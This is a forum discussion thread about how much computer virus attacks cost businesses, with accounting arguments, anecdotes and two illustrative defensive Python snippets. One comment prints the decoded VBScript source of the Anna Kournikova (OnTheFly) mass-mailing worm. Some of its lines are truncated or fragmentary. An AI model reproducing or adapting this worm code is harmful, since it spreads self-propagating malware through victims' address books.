How Much Do Computer Virus Attacks Really Cost?
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accountants don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and they claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected", which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saying that only 10,000 machines had been hit.
</rant>
--
A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone you emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped us that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.
-B
Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
--
"It's tough to be bilingual when you get hit in the head."
Viruses are probably even MORE costly. Consider:
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tech company on the rise. And let's suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
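The calculation described in the comment above, as an added example that is not part of the original post: it shifts and lowers a revenue curve, then discounts the day-by-day difference back to today. The revenue curve, the 2% haircut, the 6% interest rate and all function names are constructed assumptions.

```python
# Added illustration; every number below is constructed, not measured data.

def daily_rate(annual_rate):
    """Convert an annual interest rate to the equivalent daily compounding rate."""
    return (1.0 + annual_rate) ** (1.0 / 365.0) - 1.0

def hit_scenario(baseline, delay_days, haircut):
    """Shift the baseline right by delay_days, then lower it by haircut (0..1).

    The series is cut at the baseline's length: the horizon ends when the
    company without the hit folds.
    """
    shifted = [0.0] * delay_days + list(baseline)
    return [x * (1.0 - haircut) for x in shifted[:len(baseline)]]

def present_value_of_loss(baseline, with_hit, annual_rate):
    """Deposit needed today to pay out (baseline - with_hit) on each day.

    Days where with_hit exceeds baseline give negative terms, i.e. deposits.
    """
    r = daily_rate(annual_rate)
    return sum((b - h) / (1.0 + r) ** day
               for day, (b, h) in enumerate(zip(baseline, with_hit)))

def product_revenue(days, peak, ramp_days):
    """Constructed curve: linear ramp up to peak, then flat until the product folds."""
    return [peak * min(1.0, (d + 1) / ramp_days) for d in range(days)]

if __name__ == "__main__":
    base = product_revenue(days=730, peak=10_000.0, ramp_days=90)
    hit = hit_scenario(base, delay_days=1, haircut=0.02)
    print(round(present_value_of_loss(base, hit, annual_rate=0.06), 2))
```

The result is only as good as the two predicted curves, which is the comment's own caveat.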
Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
Mmmm.. Donuts
I don't have costs on viruses out there. I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string:
e r(0)& "\AnnaKournikova.jpg.vbs"
, True)
;o)"
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
It can cost a lot when a business gets hit hard by a virus..but it shouldn't.
Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking .vbs files TODAY, you need to be asking why not.
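The attachment block described in the comment above, sketched as an added example (not the commenter's gateway configuration): the decision is made on the final extension, so a double-extension name such as AnnaKournikova.jpg.vbs is caught. The extensions beyond .vbs, the function names and the sample messages are assumptions constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Assumption: block list of Windows Script Host types; the comment names only .vbs.
BLOCKED_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

def final_extension(filename):
    """Return the last extension, lowercased, ignoring trailing dots and spaces."""
    cleaned = filename.strip().rstrip(". ").lower()
    return "." + cleaned.rsplit(".", 1)[1] if "." in cleaned else ""

def blocked_attachments(raw_bytes):
    """List filenames in a raw message whose final extension is blocked."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    hits = []
    for part in msg.walk():
        name = part.get_filename()  # None for parts without a filename
        if name and final_extension(name) in BLOCKED_EXTENSIONS:
            hits.append(name)
    return hits

def gateway_verdict(raw_bytes):
    """REJECT if any attachment is blocked, otherwise ACCEPT."""
    hits = blocked_attachments(raw_bytes)
    return ("REJECT", hits) if hits else ("ACCEPT", [])

def build_sample(filename):
    """Constructed test message carrying inert placeholder bytes, not a script."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "constructed sample"
    msg.set_content("constructed body")
    msg.add_attachment(b"inert placeholder", maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()

if __name__ == "__main__":
    for name in ("AnnaKournikova.jpg.vbs", "photo.jpg", "REPORT.VBS"):
        print(name, gateway_verdict(build_sample(name)))
```

Logging each REJECT with its filename gives the kind of hit count the commenter mentions.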
Windows ME sells for 169.99 at Amazon.com
I love you, Stéphanie
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh!